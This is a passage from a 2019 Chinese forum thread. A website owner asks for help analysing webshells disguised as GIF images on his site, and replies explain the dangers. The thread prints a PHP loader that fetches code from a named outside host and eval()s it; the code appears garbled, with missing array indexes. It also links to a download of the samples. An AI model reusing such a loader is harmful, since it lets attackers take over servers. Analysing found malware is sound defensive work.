【已解决】网站中毒,找到几个GIF病毒和一个exe文件,求分析
本帖最后由 Y-one 于 2019-12-4 15:07 编辑站点找到几个病毒,之前的网站一直被百度判定为黑帽手段,导致站点排名下降厉害
今天找到几个病毒求分析,看看这几个病毒是干啥的,在我网站做了啥
还有就是病毒是不是和这个域名有关系163去掉jiang点com感谢各位大佬
第一次求助谢谢!!!https://pan.baidu.com/s/1Sdr5M-l700DI5j1EOdppUg 提取 x8zr
<?php
set_time_limit(666);
$i = array("cms","chr","http://","www.phpsec.cc/Hack","/bypasswaf.gif");
s($i,$i.$i.$i);
session_start();
function s($c,$url){
if(empty($_SESSION['PhpCode'])){
$_SESSION['PhpCode']=file_get_contents($url);
m($_SESSION['PhpCode'],$c);
}
}
function m($a,$c){
$unzip=$c(103).$c(122).$c(105).$c(110);
$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
$ss = "";
l($unzip($a),$ss);
}
function l($xx,$ss){
$password = "admin";
$MyName = "Admin";
@eval($xx.$ss);
}
?> Y-one 发表于 2019-12-3 15:36
大马的危害是什么呢?小哥哥,劳烦多说一点涨涨知识
就是webshell,有这个就可以提权,控制你的网站,写入恶意代码,你检查下你网页代码,首页什么的,看看有没有多余的代码,可以提权控制你的服务器,植入其他木马,挖矿,刷流量,加广告什么的 右键 以文本打开就可以看到了 这么隐蔽你是咋发现的{:1_921:} 怎么发现的这么厉害 苏浩 发表于 2019-12-3 13:46
右键 以文本打开就可以看到了
加密了,看不了,不知道怎么解开 featmellwo 发表于 2019-12-3 13:56
老哥麻烦多说一些,看不懂,这个是揭开之后的? 厉害了,这都被你发现了 59K那个,是大马,小的点是楼上那个,小马,你看图吧,后缀改成txt拉下就可以看到,文件头是图片,后面则是马的代码.......就是可能在你网页源码里面插入恶意的链接刷流量 caniy 发表于 2019-12-3 15:24
59K那个,是大马,小的点是楼上那个,小马,你看图吧,后缀改成txt拉下就可以看到,文件头是图片,后面则是马的代 ...
大马的危害是什么呢?小哥哥,劳烦多说一点涨涨知识
页:
[1]
2